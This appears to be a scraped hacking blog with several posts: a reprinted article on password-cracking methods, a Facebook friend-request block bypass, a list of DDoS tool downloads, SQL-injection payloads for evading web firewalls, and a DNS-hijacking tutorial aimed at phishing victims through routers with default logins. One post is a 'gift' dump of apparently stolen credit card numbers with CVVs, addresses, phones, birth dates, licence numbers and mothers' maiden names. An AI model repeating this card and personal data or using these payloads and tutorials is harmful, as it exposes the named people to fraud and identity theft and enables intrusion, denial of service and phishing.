Pages

Showing posts with label Extra Advance. Show all posts
Showing posts with label Extra Advance. Show all posts

Thursday, May 30, 2013

Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331”

Killing hashes?

Like Nate Anderson's foray into password cracking, radix was able to crack 4,900 of the passwords, nearly 30 percent of the haul, solely by using the RockYou list. He then took the same list, cut the last four characters off each of the words, and appended every possible four-digit number to the end. Hashcat told him it would take two hours to complete, which was longer than he wanted to spend. Even after terminating the run two after 20 minutes, he had cracked 2,136 more passcodes. radix then tried brute-forcing all numbers, starting with a single digit, then two digits, then three digits, and so on (259 additional plains recovered).
He seemed to choose techniques for his additional runs almost at random. But in reality, it was a combination of experience, intuition, and possibly a little luck.
"It's all about analysis, gut feelings, and maybe a little magic," he said. "Identify a pattern, run a mask, put recovered passes in a new dict, run again with rules, identify a new pattern, etc. If you know the source of the hashes, you scrape the company website to make a list of words that pertain to that specific field of business and then manipulate it until you are happy with your results."
He then ran the 7,295 plains he recovered so far through PACK, short for the Password Analysis and Cracking Toolkit (developed by password expert Peter Kacherginsky), and noticed some distinct patterns. A third of them contained eight characters, 19 percent contained nine characters, and 16 percent contained six characters. PACK also reported that 69 percent of the plains were "stringdigit" meaning a string of letters or symbols that ended with numbers. He also noticed that 62 percent of the recovered passwords were classified as "loweralphanum," meaning they consisted solely of lower-case letters and numbers.
This information gave him fodder for his next series of attacks. In run 4, he ran a mask attack. This is similar to the hybrid attack mentioned earlier, and it brings much of the benefit of a brute-force attack while drastically reducing the time it takes to run it. The first one tried all possible combinations of lower-case letters and numbers, from one to six characters long (341 more plains recovered). The next step would have been to try all combinations of lower-case letters and numbers with a length of eight. But that would have required more time than radix was willing to spend. He then considered trying all passwords with a length of eight that contained only lower-case letters. Because the attack excludes upper case letters, the search space was manageable, 268 instead of 528. With radix's machine, that was the difference between spending one hour and six hours respectively. The lower threshold was still more time than he wanted to spend, so he skipped that step too.
So radix then shifted his strategy and used some of the rule sets built into Hashcat. One of them allows Hashcat to try a random combination of 5,120 rules, which can be anything from swapping each "e" with a "3," pulling the first character off each word, or adding a digit between each character. In just 38 seconds the technique recovered 1,940 more passwords.
"That's the thrill of it," he said. "It's kind of like hunting, but you're not killing animals. You're killing hashes. It's like the ultimate hide and seek." Then acknowledging the dark side of password cracking, he added: "If you're on the slightly less moral side of it, it has huge implications."
Steube also cracked the list of leaked hashes with aplomb. While the total number of words in his custom dictionaries is much larger, he prefers to work with a "dict" of just 111 million words and pull out the additional ammunition only when a specific job calls for it. The words are ordered from most to least commonly used. That way, a particular run will crack the majority of the hashes early on and then slowly taper off. "I wanted it to behave like that so I can stop when things get slower," he explained.
Early in the process, Steube couldn't help remarking when he noticed one of the plains he had recovered was "momof3g8kids."
"This was some logic that the user had," Steube observed. "But we didn't know about the logic. By doing hybrid attacks, I'm getting new ideas about how people build new [password] patterns. This is why I'm always watching outputs."
The specific type of hybrid attack that cracked that password is known as a combinator attack. It combines each word in a dictionary with every other word in the dictionary. Because these attacks are capable of generating a huge number of guesses—the square of the number of words in the dict—crackers often work with smaller word lists or simply terminate a run in progress once things start slowing down. Other times, they combine words from one big dictionary with words from a smaller one. Steube was able to crack "momof3g8kids" because he had "momof3g" in his 111 million dict and "8kids" in a smaller dict.
"The combinator attack got it! It's cool," he said. Then referring to the oft-cited xkcd comic, he added: "This is an answer to the batteryhorsestaple thing."
What was remarkable about all three cracking sessions were the types of plains that got revealed. They included passcodes such as "k1araj0hns0n," "Sh1a-labe0uf," "Apr!l221973," "Qbesancon321," "DG091101%," "@Yourmom69," "ilovetofunot," "windermere2313," "tmdmmj17," and "BandGeek2014." Also included in the list: "all of the lights" (yes, spaces are allowed on many sites), "i hate hackers," "allineedislove," "ilovemySister31," "iloveyousomuch," "Philippians4:13," "Philippians4:6-7," and "qeadzcwrsfxv1331." "gonefishing1125" was another password Steube saw appear on his computer screen. Seconds after it was cracked, he noted, "You won't ever find it using brute force."
The ease these three crackers had converting hashes into their underlying plaintext contrasts sharply with the assurances many websites issue when their password databases are breached. Last month, when daily coupons site LivingSocial disclosed a hack that exposed names, addresses, and password hashes for 50 million users, company executives downplayed the risk.
"Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one," CEO Tim O'Shaughnessy told customers.
In fact, there's almost nothing preventing crackers from deciphering the hashes. LivingSocial used the SHA1 algorithm, which as mentioned earlier is woefully inadequate for password hashing. He also mentioned that the hashes had been "salted," meaning a unique set of bits had been added to each users' plaintext password before it was hashed. It turns out that this measure did little to mitigate the potential threat. That's because salt is largely a protection against rainbow tables and other types of precomputed attacks, which almost no one ever uses in real-world cracks. The file sizes involved in rainbow attacks are so unwieldy that they fell out of vogue once GPU-based cracking became viable. (LivingSocial later said it's in the process of transitioning to the much more secure bcrypt function.)
Officials with Reputation.com, a service that helps people and companies manage negative search results, borrowed liberally from the same script when disclosing their own password breach a few days later. "Although it was highly unlikely that these passwords could ever be decrypted, we immediately changed the password of every user to prevent any possible unauthorized account access," a company e-mail told customers.
Both companies should have said that, with the hashes exposed, users should presume their passwords are already known to the attackers. After all, cracks against consumer websites typically recover 60 percent to 90 percent of passcodes. Company officials also should have warned customers who used the same password on other sites to change them immediately.
To be fair, since both sites salted their hashes, the cracking process would have taken longer to complete against large numbers of hashes. But salting does nothing to slow down the cracking of a single hash and does little to slow down attacks on small numbers of hashes. This means that certain targeted individuals who used the hacked sites—for example, bank executives, celebrities, or other people of particular interest to the attackers—weren't protected at all by salting.
The prowess of these three crackers also underscores the need for end users to come up with better password hygiene. Many Fortune 500 companies tightly control the types of passwords employees are allowed to use to access e-mail and company networks, and they go a long way to dampen crackers' success.
"On the corporate side, its so different," radix said. "When I'm doing a password audit for a firm to make sure password policies are properly enforced, it's madness. You could go three days finding absolutely nothing."
Websites could go a long way to protect their customers if they enforced similar policies. In the coming days, Ars will publish a detailed primer on passwords managers. It will show how to use them to generate long, random passcodes that are unique to each site. Because these types of passwords can only be cracked by brute force, they are the hardest to recover. In the meantime, readers should take pains to make sure their passwords are a minimum of 11 characters, contain upper- and lower-case letters, numbers, and letters, and aren't part of a pattern.
The ease these crackers had in recovering as many as 90 percent of the hashes they targeted from a real-world breach also exposes the inability many services experience when trying to measure the relative strength or weakness of various passwords. A recently launched site from chipmaker Intel asks users "How strong is your password?," and it estimated it would take six years to crack the passcode "BandGeek2014". That estimate is laughable given that it was one of the first ones to fall at the hands of all three real-world crackers.
As Ars explained recently, the problem with password strength meters found on many websites is they use the total number of combinations required in a brute-force crack to gauge a password's strength. What the meters fail to account for is that the patterns people employ to make their passwords memorable frequently lead to passcodes that are highly susceptible to much more efficient types of attacks.
"You can see here that we have cracked 82 percent [of the passwords] in one hour," Steube said. "That means we have 13,000 humans who did not choose a good password." When academics and some websites gauge susceptibility to cracking, "they always assume the best possible passwords, when it's exactly the opposite. They choose the worst."

Sunday, April 21, 2013

Credit Cards H4cking Methods

This summary is not available. Please click here to view the post.

Send Friend Requests On Facebook Easily When You Are Blocked


Facebook
 is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friend make misuse of that thing.

However, sometimes you may even get blocked when you send friend request to known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even if you are blocked.
How To Send Friend Requests On Facebook When You Are Blocked
With help of this trick you can send 1000′s of friend requests even if you are blocked. So without wasting time let’s start how this trick works?

How To Send Friend Requests On Facebook When You Are Blocked

If you are going to add some unknown person then you need the email address of that person to whom you are going to add. After you get the email address of the personal whom you want to send friend request either from his profile or any other way, follow these steps.
1. Head over this LINK.
Here you will find a place to add a friends through their Emails based on the different Mail Services. But, if you’re thinking of adding too many people then it would be better that you create a contact file.
If you don’t know the easiest way to make contact file then follow these steps.
a) Open new text document (.txt) in notepad.
b) Add all the email addresses separated by a comma ( , ).
c) Now save that file with the extension .vcf
Now this is your contact file.
2. Upload this file to Facebook. and you will be prompted to send friend request.
NOTE : If you don’t know how to upload contact file then follow this step.
http://www.facebook.com/?sk=ff Go to this link! In that the last option is of ‘other tools’ in which you will find the next option to upload the file!
3. Click “OK”and You’re done.
Simple yet effective! Your friend request would be sent to desired people.
If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent’ then you can refer another trick which will help you in bypassing this error.

Monday, December 31, 2012

CREDIT CARDS FROM CyB3r @nG3L AS A GIFT OF HAPPY NEW YAER!!!


USE VPN TO MAKE YOUR SELF SECURE
Hi frends as i told you before on facebook

Happy New Year!!!! from my side to all frends :D
a small gift from my side ;) :D
if some of the ccs odnt wokr so dont worry try others
and 1 more thing make our if of the country of which the
cc is or otherwise some of the cc will not work :D
coz of blocked trasctions of out of country
and plz dont ask me abt how to withdraw them
if i knew i would not told u
so buy stuff online :D
i more thing some f these r mine own finding and
some ofother frends so dont say tht those r mine
jst chill and enjoy...
and if still you dont get anything then i am sorry coz
i am sharing dozens of ccs :P
HAPPY NEW YEAR!!!!!!! :D

regards;

CyB3r @nG3L , Mendex Hax, Solider Of God Dr.x00t(pkshadow) , Dr@cul@ ,All VOBHH members & all Pakistani frends of mine



XXXXXXXXXXXXXXXXXXXXXXXXXXXXxXXXX


4625664105005664

CVV: 467
EXP: 08/14
First Name: Gal
Last Name: Fix
email: galfix1@gmail.com
Phone: 6468126463
Country: USA
State: NY
City: New York
ZIP: 10003
Address: 131 E 17th St

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


4207670051413923

CVV: 634
EXP: 11/16
First Name: Thomas
Last Name: Welker
DoB: N/A
email: N/A
Phone: 19149602231
State: NY
City: New Rochelle
ZIP: 10801
Address: 70 Locust Avenue Apt #B515

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


4432644033050340

CVV: 976
EXP: 11/13
First Name: Darrell
Last Name: Hogue
DoB: N/A
email: N/A
Phone: 13149185357
State: MS
City: Bridgeton
ZIP: 63044
Address: 10960 Saxonhall Dr,

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


4056250000161758

CVV: 092
EXP: 04/14
First Name: Mary Jane
Last Name: Kleinosky
Country: USA
State: PENNSYLVANIA
City: Johnstown
ZIP: 15905-3167
Address: 77 VioletSt. Lucia

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx


4120085000000644

CVV: 097
EXP: 04/15
First Name: Cecelia
Last Name: Gililland
Country: USA
State: COLORADO
City: Leadville
ZIP: 80461-0565
Address: 177 Daisy Dr.

XXXXXXXXXXXXXXXXXXXXXXXXXXX


4366530001758958

CVV: 043
EXP: 07/16
First Name: Amelia Island Restaurant
Last Name: Group
email: davids802ash@gmail.com
Phone: 9043106049 Country: USA
State: FL
City: Fernandina Beach
ZIP: 32034
Address: 802 ash street

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Visa

4625664105005664

CVV: 467
EXP: 08/14
First Name: Gal
Last Name: Fix
email: galfix1@gmail.com
Phone: 6468126463
Country: USA
State: NY
City: New York
ZIP: 10003
Address: 131 E 17th St
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
visa

4056250000161758

CVV: 092
EXP: 04/14
First Name: Mary Jane
Last Name: Kleinosky
Country: USA
State: PENNSYLVANIA
City: Johnstown
ZIP: 15905-3167
Address: 77 VioletSt. Lucia

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Number: 4003442632047893

EXP: 0513
CVV: 543
Name: Steven Morycz
Country: United States
State: MI
ZIP: 48045
City: harrison twp
Street: 38511 foxcroft
Phone: 586-292-3294
Bank: CAPITAL ONE BANK (USA), NATIONAL ASSOCIATION PLATINUM
Email: stevenmorycz@yahoo.com

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXxXXX


Full AU CC uncheck


# 109.245.0.136 net136-0-245-109.mbb.telenor.rs

Name: Miss Malisa..Radic
Address: 44 Pethajohn Parade
City: Grovedale
State: Victoria
Zip: 3216
Phone: 0430370005
ccnum: 375416520560520
expdate: 3 - 2015
cvv: 4830
DriverName: Malisa Radic
DriverLicence: 092256446
Driver EXP d/m/y: 27/10/2012
Mother: Radic
DOB d/m/y: 23/10/1990

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 149.135.145.66 149.135.145.66

Name: Mrs Judith.Michelle.Riley
Address: 23 raymond avd
City: Devonport
State: Tasmania
Zip: 7310
Phone: 0408465528
ccnum: 4293210000210180
expdate: 8 - 2015
cvv: 260
DriverName: Judith michelle riley
DriverLicence: F47762
Driver EXP d/m/y: 4/4/2013
Mother: Broome
DOB d/m/y: 25/11/1974

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 149.135.146.23 149.135.146.23

Name: Mr Rhys.Kenneth.Aquilina
Address: 24 Kellett Road
City: Woodend
State: Victoria
Zip: 3442
Phone: 0423289306
ccnum: 5217295206929782
expdate: 1 - 2015
cvv: 440
DriverName: Mr Rhys K Aquilina
DriverLicence: 093207373
Driver EXP d/m/y: 18/6/2013
Mother: Mclennan
DOB d/m/y: 10/6/1991

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx


Full AU CC uncheck


# 212.183.128.85 212.183.128.85

Name: Ms Alana.Elizabeth.Paterson
Address: Unit 110/2 rouse st
City: Port Melbourne
State: Victoria
Zip: 3207
Phone: 0419879089
ccnum: 4567343010711782
expdate: 11 - 2014
cvv: 176
DriverName: A Paterson
DriverLicence: 084006020
Driver EXP d/m/y: 21/10/2013
Mother: Paterson
DOB d/m/y: 7/11/1982

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 124.177.28.11 cpe-124-177-28-11.lns2.dav.bigpond.net.au

Name: Mrs Gwen.elizabeth.barber
Address: 11 ALEXANDER STREET
City: Bridport
State: Tasmania
Zip: 7262
Phone: 0363561081
ccnum: 4434520000089875
expdate: 2 - 2013
cvv: 873
DriverName: gwen elizabeth barber
DriverLicence: TO1755
Driver EXP d/m/y: 17/10/2013
Mother: leonard
DOB d/m/y: 24/1/1947

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 58.168.194.99 cpe-58-168-194-99.lns3.win.bigpond.net.au

Name: Ms Veronica.Jane .Keegel
Address: 8 Mordaunt Drive
City: Hillside
State: Victoria
Zip: 3037
Phone: 0400569634
ccnum: 4564740002726629
expdate: 4 - 2015
cvv: 843
DriverName: Veronica J Keegel
DriverLicence: 043870727
Driver EXP d/m/y: 20/10/2020
Mother: Ludekens
DOB d/m/y: 2/6/1970

XXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 49.176.100.172 pa49-176-100-172.pa.nsw.optusnet.com.au

Name: Ms Maria.Vanessa.James
Address: 22 school rd
City: Wynnum west
State: Queensland
Zip: 4178
Phone: 0432659075
ccnum: 4564320000338964
expdate: 2 - 2015
cvv: 943
DriverName: James Maria Vanessa
DriverLicence: 14527291
Driver EXP d/m/y: //
Mother: Thomas
DOB d/m/y: 18/10/1969

XXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 149.135.145.26 149.135.145.26

Name: Miss Tiffany .Margaret.Watson
Address: 50/17 ferry lane
City: Bulimba
State: Queensland
Zip: 4171
Phone: 0754845739
ccnum: 5188680103965267
expdate: 7 - 2014
cvv: 029
DriverName: Tiffany m Watson
DriverLicence: 087541420
Driver EXP d/m/y: 20/3/2013
Mother: Jeffery
DOB d/m/y: 17/1/1986

XXXXXXXXXXXXXXXXXXXXXXXX


Full AU CC uncheck


# 149.135.145.111 149.135.145.111

Name: Mrs Judith.Michelle.Riley
Address: 23 raymond ave
City: Devonport
State: Tasmania
Zip: 7310
Phone: 0408465528
ccnum: 4293210000210180
expdate: 8 - 2015
cvv: 260
DriverName: Judith michelle riley
DriverLicence: F47762
Driver EXP d/m/y: 4/4/2013
Mother: Brooke
DOB d/m/y: 25/11/1974

XXXXXXXXXXXXXXXXXXXXXXXXX


Free NON VBV Visa -

4868960025449602
06/13
772
Claire Hippele
50 Acorn Dr
Diamond Point
New York
12824-2227
United states
(518) 644-2630

XXXXXXXXXXXXXXXXXXXX


Thursday, December 6, 2012

HACKERS SPECIAL TOOLS


WEBSITE CRUSHER
http://www.hybridsec.com/tools/rudy/

XerXes STRONG DDoSser **COD3**:
http://pastebin.com/aWZMbjSU

HULK DDoSser:
http://www.mediafire.com/?tb7d9t203v7twdy

TORSHAMMER:
http://pastebin.com/Vq90V9yn

TOOLS:
http://www.4shared.com/rar/qB4gN_QJ/Ul7r...0l5_4.html

TOOL PACK: any password requests: 123123
http://www.mediafire.com/?syx7ad1yot8n3

Ddos tools -LOIC download from here : http://sourceforge.net/projects/loic/fil...t/download

Anonymous Weapons:
http://anonymousks.weebly.com/weapons.html

LOIC tutorial (if u dont know how to use it):
http://www.youtube.com/watch?v=sQRu-J3f_Kw

FireFlood, Download link : http://www.2shared.com/file/2CGUUHtB/Fireflood_12.html

Anonymous DoSer, Download link : http://www.2shared.com/file/UOZbt7I0/Ano...DoSer.html

Online HOIC (Change threads to 1,000 and enter URL)
http://pastehtml.com/view/blclqdm91.html

[: Denial-of-service attack & Deface Programs :]
http://www.mediafire.com/?3j9lp4avc1tjplt

[:AirVPN:]
http://www.airvpn.org

[:OpenVPN;]
http://openvpn.net/

[: Cyber Ghost VPN Program :]
http://cyberghostvpn.com/

Try AnonymoX Mozilla Add-On for IP change in browser only.

DownloadsAnonymity
TOR project  https://www.torproject.org/

Virtual Private Network (VPN) I'm not suggesting free as these as are unreliable as they hand IP addresses over.There are many paid for VPN services offered at decent prices.Do Not Track Plus stops tracking companies
http://www.abine.com/dntdetail.php 

No Script for Firefox
 https://addons.mozilla.org/en-US/firefox/addon/noscript/

No Script add on for Chrome  https://chrome.google.com/webstore/search/script%20no

Denial of Service toolsLOIC (Low Orbit Ionic Cannon) DDoS tool http://www.mediafire.com/?lw3olbd16nfb0if (Not suggested)
HOIC (High Orbit Ionic Cannon) DDoS tool  
http://www.mediafire.com/?89ke5ycza492agc 
Pyloris  DoS http://sourceforge.net/projects/pyloris/  Slowloris http://ha.ckers.org/slowloris/ 
Tor's Hammer
http://packetstormsecurity.org/files/988...mlEgyptian
Anonymous DDoS toolkit http://www.mediafire.com/?0jre45981c9eyt4Byte Dos 3.2 http://www.mediafire.com/?77navzcam51n2bn
Anon guns This link goes to an HTTPS secured site.https://rapidshare.com/files/1746996499/...ns__1_.rar
Bangledshi attack kit http://www.mediafire.com/?liuzayl3bendyuy 
Care packagesEarthQuakeInABox
 http://anonsource.org/page.php?14
More care packages  http://remainanonymous.org/get-involved/
Pirate toolsBittorrent<--- I like better lol than Utorrent http://www.bittorrent.com/ 
To get torrents go to http://thepiratebay.se/ or http://malaysiabay.org:6081/
its a mirror. Sweden hardly ever hands out IP addresses.
 If you live in England or any site where TPB is banned download this http://filesmelt.com/dl/Unblock_Piratebay_v2.exe .
Also you can get onto most sites with the TOR PROJECT.
Sony property made by a anon  --> http://pastehtml.com/view/bllpf04jv.html Reliable torrent site http://www.yify-torrents.com/ 

Anonops Radio(they need more listeners) Anonops Radio http://www.radioanonops.com/ 

You have all the tools. You need. Now go FIGHT. :)
Thanks For Supporting. Stay Tuned<--

Monday, December 3, 2012

Shell & Malicious Files Scanner V1.5




An effective tool to detect malicious files and malicious codes on your site with all the flexibility and confidence, and provide you with many options for scanning with full control management over your files , is also characterized by high speed to accomplish the task compared to other screening programs.


Features:

- 26 smart way to scan.

- Full cPanel and DirectAdmin support.

- Working in an emergency very quickly.

- And a modern user interface easy to use.

- Scan all home user directory.

- Consume fewer resources on the server compared to other scanning programs.

- Working on the PHP platform and thus can work on all platforms without restrictions.

- Exclusive idea the tool have not been implemented by this way.


.::DOWNLOAD::.

ByPassing WAF | Advance Methods


Advanced Methods:


Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

If you do not read my first post on BASIC WAF BYPASSING then read it here Basic Method

1) Buffer Overflow / Firewall Crash:

 

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

    http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

    (( You can test if the WAF can be crashed by typing:
   

 ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

    If you get a 500, you can exploit it using the Buffer Overflow Method! ))

 

2) Replace Characters with their HEX Values:

 

We can replace some characters with their HEX (URL-Encoded) Values.
Example:

    http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
    (which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): 

http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

 

Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version       | version()
concat()           | concat_ws()  --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

4) Misc Exploitable Functions:

 

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:

    This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

    http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…

    (If the Firewall removes the “*”, the result will be: 15+union+select….)
    So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

    -15+(uNioN)+(sElECt)….

    -15+(uNioN+SeleCT)+…

    -15+(UnI)(oN)+(SeL)(ecT)+….

    -15+union (select 1,2,3,4…)


I hope this post will clearly understand you how you can bypass the WAF.........

DNS Hacking/Hijacking Tutorial



This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.

To start, you’ll need

• A computer running Linux (Ubuntu in my case)

• A basic understanding of how the Domain Name System (DNS) works.

Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.


Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.

If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.

The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)

To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up aMetasploit browser_autopwn module . You can have lots of fun with that


But how do you get a victim? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

if you find the post successful then share this.......